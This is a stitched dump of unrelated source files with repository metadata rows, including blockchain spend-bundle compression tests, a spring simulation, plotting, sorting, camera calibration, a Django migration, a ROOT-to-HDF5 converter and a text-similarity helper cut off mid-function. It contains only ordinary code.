@dataclass(frozen=True)
class MultipleCompressorArg:
    """Test fixture pairing a list of generator references with a split offset."""
    # Generator references whose bytes are reused during decompression.
    arg: List[CompressorArg]
    # Byte offset applied to the reference end positions when splitting the
    # standard-transaction prefix between the two references (see
    # create_multiple_ref_generator).
    split_offset: int
def create_multiple_ref_generator(args: MultipleCompressorArg, spend_bundle: SpendBundle) -> BlockGenerator:
    """
    Decompress a transaction by referencing bytes from multiple input generator references
    """
    cse_list = compressed_coin_spend_entry_list(spend_bundle)
    first_ref, second_ref = args.arg[0], args.arg[1]
    program = TEST_MULTIPLE.curry(
        DECOMPRESS_PUZZLE,
        DECOMPRESS_CSE_WITH_PREFIX,
        first_ref.start,
        first_ref.end - args.split_offset,
        second_ref.end - args.split_offset,
        second_ref.end,
        cse_list,
    )
    # TODO aqk: Improve ergonomics of CompressorArg -> GeneratorArg conversion
    generator_args = [
        GeneratorArg(FAKE_BLOCK_HEIGHT1, first_ref.generator),
        GeneratorArg(FAKE_BLOCK_HEIGHT2, second_ref.generator),
    ]
    return BlockGenerator(program, generator_args)
def spend_bundle_to_coin_spend_entry_list(bundle: SpendBundle) -> List[Any]:
    """Expand a SpendBundle into [parent_id, puzzle_sexp, amount, solution_sexp]
    entries, deserializing puzzle and solution into SExp objects."""
    return [
        [
            spend.coin.parent_coin_info,
            sexp_from_stream(io.BytesIO(bytes(spend.puzzle_reveal)), SExp.to),
            spend.coin.amount,
            sexp_from_stream(io.BytesIO(bytes(spend.solution)), SExp.to),
        ]
        for spend in bundle.coin_spends
    ]
class TestCompression(TestCase):
    """Tests for spend-bundle compression helpers in full_node.bundle_tools."""
    def test_spend_bundle_suitable(self):
        """A freshly made spend bundle should be accepted for compression."""
        sb: SpendBundle = make_spend_bundle(1)
        assert bundle_suitable_for_compression(sb)
    def test_compress_spend_bundle(self):
        # Placeholder — no assertions yet.
        pass
    def test_multiple_input_gen_refs(self):
        """Decompression must give the same result for every prefix split offset."""
        start1, end1 = match_standard_transaction_at_any_index(gen1)
        start2, end2 = match_standard_transaction_at_any_index(gen2)
        ca1 = CompressorArg(FAKE_BLOCK_HEIGHT1, SerializedProgram.from_bytes(gen1), start1, end1)
        ca2 = CompressorArg(FAKE_BLOCK_HEIGHT2, SerializedProgram.from_bytes(gen2), start2, end2)
        prefix_len1 = end1 - start1
        prefix_len2 = end2 - start2
        assert prefix_len1 == prefix_len2
        prefix_len = prefix_len1
        results = []
        # Try every possible split point of the shared prefix.
        for split_offset in range(prefix_len):
            gen_args = MultipleCompressorArg([ca1, ca2], split_offset)
            spend_bundle: SpendBundle = make_spend_bundle(1)
            multi_gen = create_multiple_ref_generator(gen_args, spend_bundle)
            cost, result = run_generator(multi_gen, INFINITE_COST)
            results.append(result)
            assert result is not None
            assert cost > 0
        # All split offsets must decompress to an identical result.
        assert all(r == results[0] for r in results)
    def test_compressed_block_results(self):
        """Compressed and simple generators must decompress to the same result."""
        sb: SpendBundle = make_spend_bundle(1)
        start, end = match_standard_transaction_at_any_index(original_generator)
        ca = CompressorArg(uint32(0), SerializedProgram.from_bytes(original_generator), start, end)
        c = compressed_spend_bundle_solution(ca, sb)
        s = simple_solution_generator(sb)
        assert c != s
        cost_c, result_c = run_generator(c, INFINITE_COST)
        cost_s, result_s = run_generator(s, INFINITE_COST)
        print(result_c)
        assert result_c is not None
        assert result_s is not None
        assert result_c == result_s
    def test_get_removals_for_single_coin(self):
        """Puzzle/solution lookup for a removal must match the original spend."""
        sb: SpendBundle = make_spend_bundle(1)
        start, end = match_standard_transaction_at_any_index(original_generator)
        ca = CompressorArg(uint32(0), SerializedProgram.from_bytes(original_generator), start, end)
        c = compressed_spend_bundle_solution(ca, sb)
        removal = sb.coin_spends[0].coin.name()
        error, puzzle, solution = get_puzzle_and_solution_for_coin(c, removal, INFINITE_COST)
        assert error is None
        assert bytes(puzzle) == bytes(sb.coin_spends[0].puzzle_reveal)
        assert bytes(solution) == bytes(sb.coin_spends[0].solution)
        # Test non compressed generator as well
        s = simple_solution_generator(sb)
        error, puzzle, solution = get_puzzle_and_solution_for_coin(s, removal, INFINITE_COST)
        assert error is None
        assert bytes(puzzle) == bytes(sb.coin_spends[0].puzzle_reveal)
        assert bytes(solution) == bytes(sb.coin_spends[0].solution)
    def test_spend_byndle_coin_spend(self):
        """SExp-built and serialized coin-spend entry lists must agree byte-for-byte."""
        for i in range(0, 10):
            sb: SpendBundle = make_spend_bundle(i)
            cs1 = SExp.to(spend_bundle_to_coin_spend_entry_list(sb)).as_bin()
            cs2 = spend_bundle_to_serialized_coin_spend_entry_list(sb)
            assert cs1 == cs2
class TestDecompression(TestCase):
    """Tests for the CLVM decompression programs (puzzle, CSE, block program zero)."""
    def __init__(self, *args, **kwargs):
        super(TestDecompression, self).__init__(*args, **kwargs)
        self.maxDiff = None
    def test_deserialization(self):
        """DESERIALIZE_MOD must round-trip a serialized program."""
        self.maxDiff = None
        cost, out = DESERIALIZE_MOD.run_with_cost(INFINITE_COST, [bytes(Program.to("hello"))])
        assert out == Program.to("hello")
    def test_deserialization_as_argument(self):
        """Deserializer passed as an argument must behave identically."""
        self.maxDiff = None
        cost, out = TEST_GEN_DESERIALIZE.run_with_cost(
            INFINITE_COST, [DESERIALIZE_MOD, Nil, bytes(Program.to("hello"))]
        )
        print(bytes(Program.to("hello")))
        print()
        print(out)
        assert out == Program.to("hello")
    def test_decompress_puzzle(self):
        # Smoke test only — prints the decompressed puzzle, no assertions.
        cost, out = DECOMPRESS_PUZZLE.run_with_cost(
            INFINITE_COST, [DESERIALIZE_MOD, b"\xff", bytes(Program.to("pubkey")), b"\x80"]
        )
        print()
        print(out)
    # An empty CSE is invalid. (An empty CSE list may be okay)
    # def test_decompress_empty_cse(self):
    # cse0 = binutils.assemble("()")
    # cost, out = DECOMPRESS_CSE.run_with_cost(INFINITE_COST, [DESERIALIZE_MOD, DECOMPRESS_PUZZLE, b"\xff", b"\x80", cse0])
    # print()
    # print(out)
    def test_decompress_cse(self):
        """Decompress a single CSE / CoinSpendEntry"""
        cse0 = binutils.assemble(
            "((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0) (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3 (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ())))"
        ) # noqa
        cost, out = DECOMPRESS_CSE.run_with_cost(
            INFINITE_COST, [DESERIALIZE_MOD, DECOMPRESS_PUZZLE, b"\xff", b"\x80", cse0]
        )
        print()
        print(out)
    def test_decompress_cse_with_prefix(self):
        """Decompress a CSE whose puzzle prefix is sliced out of the reference generator."""
        cse0 = binutils.assemble(
            "((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0) (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3 (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ())))"
        ) # noqa
        start = 2 + 44
        end = start + 238
        prefix = original_generator[start:end]
        # (deserialize decompress_puzzle puzzle_prefix cse)
        cost, out = DECOMPRESS_CSE_WITH_PREFIX.run_with_cost(
            INFINITE_COST, [DESERIALIZE_MOD, DECOMPRESS_PUZZLE, prefix, cse0]
        )
        print()
        print(out)
    def test_block_program_zero(self):
        "Decompress a list of CSEs"
        self.maxDiff = None
        cse1 = binutils.assemble(
            "(((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0) (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3 (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ()))))"
        ) # noqa
        cse2 = binutils.assemble(
            """
(
   ((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0)
       (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3
           (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ()))
   )
   ((0x0000000000000000000000000000000000000000000000000000000000000001 0x0186a0)
       (0xb0a6207f5173ec41491d9f2c1b8fff5579e13703077e0eaca8fe587669dcccf51e9209a6b65576845ece5f7c2f3229e7e3
           (() (q (51 0x24254a3efc3ebfac9979bbe0d615e2eda043aa329905f65b63846fa24149e2b6 0x0186a0)) ())))
   )
"""
        ) # noqa
        start = 2 + 44
        end = start + 238
        # (mod (decompress_puzzle decompress_coin_spend_entry start end compressed_cses deserialize generator_list reserved_arg)
        # cost, out = DECOMPRESS_BLOCK.run_with_cost(INFINITE_COST, [DECOMPRESS_PUZZLE, DECOMPRESS_CSE, start, Program.to(end), cse0, DESERIALIZE_MOD, bytes(original_generator)])
        cost, out = DECOMPRESS_BLOCK.run_with_cost(
            INFINITE_COST,
            [
                DECOMPRESS_PUZZLE,
                DECOMPRESS_CSE_WITH_PREFIX,
                start,
                Program.to(end),
                cse2,
                DESERIALIZE_MOD,
                [bytes(original_generator)],
            ],
        )
        print()
        print(out)
    def test_block_program_zero_with_curry(self):
        """Same as test_block_program_zero, but with arguments curried into the program."""
        self.maxDiff = None
        cse1 = binutils.assemble(
            "(((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0) (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3 (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ()))))"
        ) # noqa
        cse2 = binutils.assemble(
            """
(
   ((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0)
       (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3
           (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ()))
   )
   ((0x0000000000000000000000000000000000000000000000000000000000000001 0x0186a0)
       (0xb0a6207f5173ec41491d9f2c1b8fff5579e13703077e0eaca8fe587669dcccf51e9209a6b65576845ece5f7c2f3229e7e3
           (() (q (51 0x24254a3efc3ebfac9979bbe0d615e2eda043aa329905f65b63846fa24149e2b6 0x0186a0)) ())))
   )
"""
        ) # noqa
        start = 2 + 44
        end = start + 238
        # (mod (decompress_puzzle decompress_coin_spend_entry start end compressed_cses deserialize generator_list reserved_arg)
        # cost, out = DECOMPRESS_BLOCK.run_with_cost(INFINITE_COST, [DECOMPRESS_PUZZLE, DECOMPRESS_CSE, start, Program.to(end), cse0, DESERIALIZE_MOD, bytes(original_generator)])
        p = DECOMPRESS_BLOCK.curry(DECOMPRESS_PUZZLE, DECOMPRESS_CSE_WITH_PREFIX, start, Program.to(end))
        cost, out = p.run_with_cost(INFINITE_COST, [cse2, DESERIALIZE_MOD, [bytes(original_generator)]])
        print()
        print(p)
        print(out)
        p_with_cses = DECOMPRESS_BLOCK.curry(
            DECOMPRESS_PUZZLE, DECOMPRESS_CSE_WITH_PREFIX, start, Program.to(end), cse2, DESERIALIZE_MOD
        )
        generator_args = create_generator_args([SerializedProgram.from_bytes(original_generator)])
        cost, out = p_with_cses.run_with_cost(INFINITE_COST, generator_args)
        print()
        print(p_with_cses)
        print(out)
| [
"83430349+lionethan@users.noreply.github.com"
] | 83430349+lionethan@users.noreply.github.com |
95769dc3343484a36dee41a90380214fab208a59 | 5761f160cdbd97b8c69601cd85bf41788b257ace | /Laboratorios/resorte_euler.py | b773c2a5be31fd94b0f6761d8d3acfcd73b2e572 | [] | no_license | daavera/METODOS | 3c63d7636ad880cad96cc6ef4f488c4e7663af58 | 775b47de08bf729e1388be46b61c5456f4524098 | refs/heads/master | 2020-12-02T05:24:41.789369 | 2017-07-30T18:00:34 | 2017-07-30T18:00:34 | 96,900,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 979 | py | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
# Physical constants (SI units assumed — TODO confirm):
g = 9.8      # gravitational acceleration
k = 42.0     # spring constant
mu = 0.15    # kinetic friction coefficient
m = 0.25     # mass attached to the spring
h = 0.001    # Euler integration time step
# Simulated time interval [min_t, max_t].
min_t = 0
max_t = 5
n_points = int((max_t - min_t)/h)
# Pre-allocated trajectories: time, position and velocity per step.
t = np.zeros(n_points)
x = np.zeros(n_points)
dx = np.zeros(n_points)
# Initial conditions: released at x = 0.2 with zero velocity.
x[0] = 0.2
dx[0] = 0.0
def func_prime_1(t, x, dx):
    """First ODE component: the derivative of position is the current velocity."""
    return dx
def func_prime_2(t, x, dx):
    """Acceleration of the mass-spring system with kinetic friction.

    Friction always opposes the motion: it is subtracted while the mass
    moves forward (dx >= 0) and added while it moves backward.
    """
    spring_accel = (-k / m) * x
    friction_accel = mu * g
    if dx >= 0:
        return spring_accel - friction_accel
    return spring_accel + friction_accel
def Euler_step(t0, x0, dx0):
    """Advance one explicit-Euler step of size h; returns (t, x, dx)."""
    slope_x = func_prime_1(t0, x0, dx0)
    slope_dx = func_prime_2(t0, x0, dx0)
    return t0 + h, x0 + slope_x * h, slope_x + slope_dx * h
# Integrate the ODE forward with explicit Euler steps.
for i in range(1,n_points):
    t[i], x[i], dx[i] = Euler_step(t[i-1],x[i-1],dx[i-1])
fig, ax1 = plt.subplots()
# Faint dashed line shows the full trajectory behind the animated marker.
plt.plot(t,x, linestyle='--', alpha=0.3)
line, = ax1.plot(t,x, '-o')
def animate(i):
    # Move the marker to the i-th sample of the trajectory.
    line.set_data(t[i],x[i]) # update the data
    return line,
ani = animation.FuncAnimation(fig, animate, n_points,
                              interval=1)
plt.show()
"da.avila@uniandes.edu.co"
] | da.avila@uniandes.edu.co |
193b3e6cc93d153726e8746368d795219d71f305 | a3775815cab7a6ece5f52a0147df3f306255aa99 | /code/python/archive/c0112_plot_truncate.py | f4df66adcad81fe9192323685661eb4872a0a541 | [
"MIT"
] | permissive | jesnyder/MeasuringStress | d7c5c900f6f4fb38d3c2ea2d31285b2ab8db8455 | c512bc352cc71e5a354980d3d509f03abec71e79 | refs/heads/main | 2023-05-29T04:16:28.155977 | 2021-06-10T01:35:08 | 2021-06-10T01:35:08 | 375,521,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,749 | py | from c0101_retrieve_ref import retrieve_ref
from c0101_retrieve_ref import retrieve_ref_color
from c0101_retrieve_ref import retrieve_sensor_unit
from c0102_timestamp import timestamp_source
from c0109_retrieve_meta import retrieve_meta
from c0111_retrieve_analyzed import retrieve_analyzed
import os
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def plot_truncate():
    """
    compare the curves to verify the end of the record was properly found
    plot the source measurements for temperature
    plot the timestamped data for the temperature
    plot the truncated data
    plot the timestamped and truncated on the same plot
    """
    print("begin plotting truncated data")
    # Study/sensor/analysis names come from the shared reference tables.
    study_list = retrieve_ref('study_list')
    sensor_list = retrieve_ref('sensor_list')
    analysis_list = retrieve_ref('analysis_list')
    analysis_type = 'truncate'
    for study in study_list:
        df_meta = retrieve_meta(study)
        source_path = list(df_meta['source_path'])
        for record in source_path:
            # One figure per record; one subplot row per sensor, single column.
            row_num, col_num, plot_num = len(sensor_list), 1, 0
            plot_width, plot_height = col_num*25, row_num*6
            plt.figure(figsize=(plot_width, plot_height))
            for sensor in sensor_list:
                # plot the truncated record
                plot_num += 1
                plt.subplot(row_num, col_num, plot_num)
                df = retrieve_analyzed(study, analysis_type, record, sensor)
                valueColor = retrieve_ref_color(str('color_' + str(analysis_type)))
                plt.scatter(df['timeMinutes'], df['measurement'], color = valueColor, label = str(analysis_type))
                plt.title( analysis_type + ' ' + record + ' ' + sensor)
                plt.xlabel('Time (minutes)')
                sensor_unit =retrieve_sensor_unit(sensor)
                plt.ylabel(str(sensor) + ' ( ' + str(sensor_unit) + ' )')
                plt.legend(bbox_to_anchor=(1, 0.5, 0.3, 0.2), loc='upper left')
                # save the plot
                # Build <study>/plot/<analysis_type>/<record>/<sensor>.png,
                # creating each directory level if missing.
                plot_path = os.path.join(study, 'plot')
                if not os.path.isdir(plot_path): os.mkdir(plot_path)
                plot_path = os.path.join(study, 'plot', analysis_type)
                if not os.path.isdir(plot_path): os.mkdir(plot_path)
                plot_path = os.path.join(study, 'plot', analysis_type, record)
                if not os.path.isdir(plot_path): os.mkdir(plot_path)
                plot_file = os.path.join(plot_path, sensor + '.png')
                plt.savefig(plot_file, bbox_inches='tight')
                print('plotting truncated data for: ' + str(plot_file))
    print("completed plotting truncated data")
| [
"jesyndre@gmail.com"
] | jesyndre@gmail.com |
8a3197965c72c05d02eb89c22ae9fd6abe9a2727 | 2331d06694b8b56ce0894f7353a2c6a4a869bb01 | /fimod/models/__init__.py | 6be4a62514cbe0226131db2c85112dcd1bee50c0 | [
"MIT"
] | permissive | Miksus/Fimod | da2bbb0d23f96e85976ccb1edb1cabc8495fb147 | 357ae2fa5693cf5170046c7387e47bafa591b3b8 | refs/heads/master | 2020-05-17T13:24:47.541762 | 2019-05-11T17:38:34 | 2019-05-11T17:38:34 | 183,734,221 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 26 | py | from .instruments import * | [
"koli.mikael@gmail.com"
] | koli.mikael@gmail.com |
6da8896820cb21775182cc8b2f30d43f369eae43 | 803176d4f2798989623c62f091f0d5cca687aad3 | /sorting_recursive.py | 7d2426d95ea2377f69e96f89c1c668f1d448098d | [] | no_license | Tylerholland12/CS2-1 | 79986bb437e4c517d80eb9ba198226cea3e83471 | a095d23c48c19926ad6fd9be55fb980904dcc495 | refs/heads/main | 2023-01-31T00:20:48.603002 | 2020-12-08T14:33:42 | 2020-12-08T14:33:42 | 304,582,069 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | #!python
def merge(items1, items2):
    """Merge given lists of items, each assumed to already be in sorted order,
    and return a new list containing all items in sorted order.

    Running time: O(n + m) — each element is visited exactly once.
    Memory usage: O(n + m) for the merged output list.
    Ties take the element from items1 first, keeping the merge stable.
    """
    merged = []
    i = j = 0
    # Consume both lists front-to-front, always taking the smaller head.
    while i < len(items1) and j < len(items2):
        if items1[i] <= items2[j]:
            merged.append(items1[i])
            i += 1
        else:
            merged.append(items2[j])
            j += 1
    # At most one of these extends with anything; the other slice is empty.
    merged.extend(items1[i:])
    merged.extend(items2[j:])
    return merged
def merge_sort(items):
    """Sort `items` with top-down merge sort and return a sorted list.

    Running time: O(n log n); memory: O(n) extra for the slices and merges.
    Inputs of length <= 1 are returned unchanged (same object); longer
    inputs produce new lists.
    """
    if len(items) <= 1:
        return items
    middle = len(items) // 2
    sorted_left = merge_sort(items[:middle])
    sorted_right = merge_sort(items[middle:])
    return merge(sorted_left, sorted_right)
def quick_sort(items, low=None, high=None):
    """Return a new sorted list using quicksort with the last element as pivot.

    Bug fix: the original called items.pop(), destructively removing the
    pivot from the caller's list at every recursion level; this version
    leaves the input untouched.

    `low` and `high` are accepted for interface compatibility but unused:
    the implementation partitions into new lists rather than sorting a
    sub-range in place.

    Best case running time: O(n log n) on balanced partitions.
    Worst case: O(n^2) on already-sorted input (last-element pivot).
    Memory usage: O(n) per recursion level for the partition lists.
    """
    if len(items) <= 1:
        return items
    pivot = items[-1]
    # Elements equal to the pivot go to the low side, matching the
    # original's `item > pivot` test for the high side.
    lesser = [item for item in items[:-1] if item <= pivot]
    greater = [item for item in items[:-1] if item > pivot]
    return quick_sort(lesser) + [pivot] + quick_sort(greater)
if __name__ == "__main__":
    # Demo: sort a sample list with both algorithms and print the results.
    items = [12, 23, 5, 2, 1, 43, 6, 34, 9]
    print(quick_sort(items))
    print(merge_sort(items)) | [
"tyler.holland@students.makeschool.com"
] | tyler.holland@students.makeschool.com |
e966da96ef00655ecfcb50ad075270f801c7e332 | b25fe1ee3ddf0ae068fe25a2a9d579543719c4b5 | /camera_calibration.py | 73db067d199904def97f90b083ea36040e1a11dc | [] | no_license | Erazor1980/CarND-P4 | feda18b7be46835d025db8221b314d5730442922 | 0326dea0e43437320553c2d6b119a2dfbcdfcc52 | refs/heads/master | 2021-01-01T04:23:25.309347 | 2017-07-17T21:49:34 | 2017-07-17T21:49:34 | 97,169,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,386 | py | import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import glob
# pre-calculated values -> for faster debugging / coding
'''
Camera matrix:
[[ 1.15396093e+03 0.00000000e+00 6.69705359e+02]
[ 0.00000000e+00 1.14802495e+03 3.85656232e+02]
[ 0.00000000e+00 0.00000000e+00 1.00000000e+00]]
Distortion coefficients:
[[ -2.41017968e-01 -5.30720497e-02 -1.15810318e-03 -1.28318544e-04 2.67124303e-02]]
'''
def get_precalculated_calibraton():
    """Return the pre-computed camera matrix and distortion coefficients.

    The values come from a previous calibrate_camera() run and are
    hard-coded here so development runs can skip chessboard detection.
    """
    camera_matrix = np.array([
        [1.15396093e+03, 0.00000000e+00, 6.69705359e+02],
        [0.00000000e+00, 1.14802495e+03, 3.85656232e+02],
        [0.00000000e+00, 0.00000000e+00, 1.00000000e+00],
    ])
    distortion = np.array([
        [-2.41017968e-01, -5.30720497e-02, -1.15810318e-03, -1.28318544e-04, 2.67124303e-02],
    ])
    return camera_matrix, distortion
# calibrate_camera: detect chessboard corners in the ./camera_cal images;
# pass show_corner_images=True to display each detected corner grid.
def calibrate_camera( show_corner_images = False ):
    """Calibrate the camera from chessboard images in ./camera_cal/.

    Detects 9x6 inner chessboard corners in every calibration image and
    feeds the correspondences to cv2.calibrateCamera.

    :param show_corner_images: when True, display each image with the
        detected corners drawn on it (250 ms per image).
    :return: (camera matrix, distortion coefficients)
    """
    img_points = [] # 2D points in image plane
    obj_points = [] # 3d points in real world
    # preparation of object points (same for all images)
    objp = np.zeros((6 * 9, 3), np.float32)
    objp[:,:2] = np.mgrid[0:9, 0:6].T.reshape(-1,2) # x, y coordinates, z = 0
    # store calibration image names in a list
    calib_images = glob.glob('./camera_cal/calibration*.jpg')
    print("Loading images and finding chessboard corners...")
    for img_name in calib_images:
        # load current image
        img = mpimg.imread(img_name)
        # convert it to grayscale (mpimg loads RGB, hence RGB2GRAY)
        gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
        # find the chessboard corners
        ret, corners = cv2.findChessboardCorners(gray, (9, 6))
        # add object points and image points if corners found
        if ret == True:
            img_points.append(corners)
            obj_points.append(objp)
            if show_corner_images == True:
                img = cv2.drawChessboardCorners(img, (9, 6), corners, ret)
                cv2.putText(img, img_name, (30,40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,255,0), 2 )
                cv2.imshow('Corners', img)
                cv2.waitKey(250)
    # CAMERA CALIBRATION
    # NOTE(review): `gray` is the last image processed by the loop above;
    # if glob found no images this raises NameError — confirm the
    # ./camera_cal/ directory is always populated.
    ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(obj_points, img_points, gray.shape[::-1], None, None)
    print("done!\nCamera calibration successfull.")
    return mtx, dist
if __name__ == "__main__":
    # Run the calibration with corner visualisation enabled.
    calibrate_camera(True) | [
"lukas.caup@gmx.de"
] | lukas.caup@gmx.de |
d4ef6a2a9b9e68b2b0415bead6910121e684520d | 7800e7fe29d2806696b56e172528db63b8cfa729 | /accounts/migrations/0003_talent_user.py | 7035e27bcf15cd45613a8584a79653b58a2137c2 | [] | no_license | brandondelpozo/startuptalentlive | 0f418f0f88ac871f72148bde719103d05b08e9ad | bfdffa515a86cb95193a6a90f9dce6028e705c96 | refs/heads/main | 2023-07-17T18:18:46.594514 | 2021-09-02T17:42:30 | 2021-09-02T17:42:30 | 334,286,071 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | # Generated by Django 3.0.6 on 2020-10-11 23:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Re-adds the Talent.user link removed in 0002 as a nullable
    # one-to-one to the project's (swappable) user model.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('accounts', '0002_remove_talent_user'),
    ]

    operations = [
        migrations.AddField(
            model_name='talent',
            name='user',
            # null=True so existing Talent rows survive the schema change.
            field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"branzzel@gmail.com"
] | branzzel@gmail.com |
7138ed2a849354335f6674e80424ccc1659246e3 | 307e52d79c9068a2648ae82bbe11cd58733bba37 | /Convert/ConvertTruth.py | 2688385564e86b4c2474fb0ca6454547eb8a182e | [] | no_license | greatofdream/Recon1t | 0aa775c43dcfa5b3da7b5894e2567fbe8e7b2991 | 80e58ba3c2c23f1efa962d02fcb2205a95aa716f | refs/heads/master | 2022-11-09T14:12:55.747488 | 2020-06-09T02:43:24 | 2020-06-09T02:43:24 | 263,953,536 | 0 | 0 | null | 2020-05-14T15:31:27 | 2020-05-14T15:31:26 | null | UTF-8 | Python | false | false | 2,440 | py | # Convert ROOT file to HDF5 file
import numpy as np
import ROOT
import sys
import os
import tables
# Define the database columns
class TruthData(tables.IsDescription):
    """Per-event Monte-Carlo truth row: energy, vertex and momentum.

    `pos` fixes the on-disk column order in the HDF5 table.
    """
    E = tables.Float64Col(pos=0)   # merged kinetic energy (EkMerged)
    x = tables.Float64Col(pos=1)   # vertex position
    y = tables.Float64Col(pos=2)
    z = tables.Float64Col(pos=3)
    px = tables.Float64Col(pos=4)  # primary-particle momentum components
    py = tables.Float64Col(pos=5)
    pz = tables.Float64Col(pos=6)
class GroundTruthData(tables.IsDescription):
    """Per-photoelectron truth row copied from the SimTriggerInfo PE list."""
    EventID = tables.Int64Col(pos=0)    # trigger number of the event
    ChannelID = tables.Int64Col(pos=1)  # PMT id that saw the PE
    PETime = tables.Float64Col(pos=2)   # hit position inside the window
    photonTime = tables.Float64Col(pos=3)
    PulseTime = tables.Float64Col(pos=4)
    dETime = tables.Float64Col(pos=5)
# Automatically add multiple root files created a program with max tree size limitation.
#
# Converts the SimTriggerInfo tree of a ROOT Monte-Carlo file into two
# PyTables tables ("TruthData" per event, "GroundTruth" per photoelectron).
if len(sys.argv)!=3:
    # Fix: error message previously read "Wront arguments!".
    print("Wrong arguments!")
    print("Usage: python ConvertTruth.py MCFileName outputFileName")
    sys.exit(1)
baseFileName = sys.argv[1]
outputFileName = sys.argv[2]
ROOT.PyConfig.IgnoreCommandLineOptions = True
FileNo = 0
# Create the output file and the group
h5file = tables.open_file(outputFileName, mode="w", title="OneTonDetector",
                        filters = tables.Filters(complevel=9))
group = "/"
# Create tables
GroundTruthTable = h5file.create_table(group, "GroundTruth", GroundTruthData, "GroundTruth")
groundtruth = GroundTruthTable.row
# NOTE: this rebinds the class name TruthData to the table object; the
# class itself is no longer reachable after this line.
TruthData = h5file.create_table(group, "TruthData", TruthData, "TruthData")
truthdata = TruthData.row
# Loop for ROOT files.
t = ROOT.TChain("Readout")
tTruth = ROOT.TChain("SimTriggerInfo")
tTruth.Add(baseFileName)
t.Add(baseFileName)
# Loop for event
for event in tTruth:
    for truthinfo in event.truthList:
        truthdata['E'] = truthinfo.EkMerged
        truthdata['x'] = truthinfo.x
        truthdata['y'] = truthinfo.y
        truthdata['z'] = truthinfo.z
        # NOTE(review): only the momentum of the LAST primary particle is
        # kept for this row — confirm single-primary events are assumed.
        for px in truthinfo.PrimaryParticleList:
            truthdata['px'] = px.px
            truthdata['py'] = px.py
            truthdata['pz'] = px.pz
        truthdata.append()
    for PE in event.PEList:
        groundtruth['EventID'] = event.TriggerNo
        groundtruth['ChannelID'] = PE.PMTId
        groundtruth['PETime'] = PE.HitPosInWindow
        groundtruth['photonTime'] = PE.photonTime
        groundtruth['PulseTime'] = PE.PulseTime
        groundtruth['dETime'] = PE.dETime
        groundtruth.append()
# Flush into the output file (closing the file flushes TruthData as well).
GroundTruthTable.flush()
h5file.close()
| [
"839566105@qq.com"
] | 839566105@qq.com |
0404207e24a8631d8b813ddd8d7e3dafffc06b32 | 0415ece6fa136346b7d450e1b3d6ca83b57abbad | /pset6/similarities/similarities/helpers.py | c866cc8c8cbed3a4989e70fbbbd86d177b57845f | [] | no_license | dishiinboxru/HarvardComputerScienceFifty | b18c19cd3804ad7299665ad3b0aed7253279554a | a5fa1da7d910cb7af31caecff5efcfed05678400 | refs/heads/master | 2022-04-16T15:59:52.968918 | 2020-04-16T16:17:16 | 2020-04-16T16:17:16 | 256,265,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,220 | py | import io
from nltk.tokenize import sent_tokenize
def lines(a, b):
    """Return the lines that appear in both a and b.

    Trailing whitespace (including the newline) is ignored when comparing.
    """
    lines_in_a = {text.rstrip() for text in io.StringIO(a)}
    lines_in_b = {text.rstrip() for text in io.StringIO(b)}
    common = list(lines_in_a.intersection(lines_in_b))
    # debugging output
    print(common)
    return common
def sentences(a, b):
    """Return sentences in both a and b"""
    sents_a = sent_tokenize(a, language='english')
    print(sents_a)
    unique_a = set(sents_a)
    sents_b = sent_tokenize(b, language='english')
    print(sents_b)
    unique_b = set(sents_b)
    shared = list(unique_a.intersection(unique_b))
    print(shared)
    return shared
def substrings(a, b, n):
    """Return substrings of length n that appear in both a and b.

    Fix: the original allocated two io.StringIO buffers (`s`, `t`) that
    were never used; they are removed here.

    :param a: first string
    :param b: second string
    :param n: window length (coerced with int())
    :return: list of the common substrings (set order, no duplicates)
    """
    set1 = set()
    set2 = set()
    length = int(n)
    print(a)
    print(b)
    # Slide a window of `length` characters over each string.
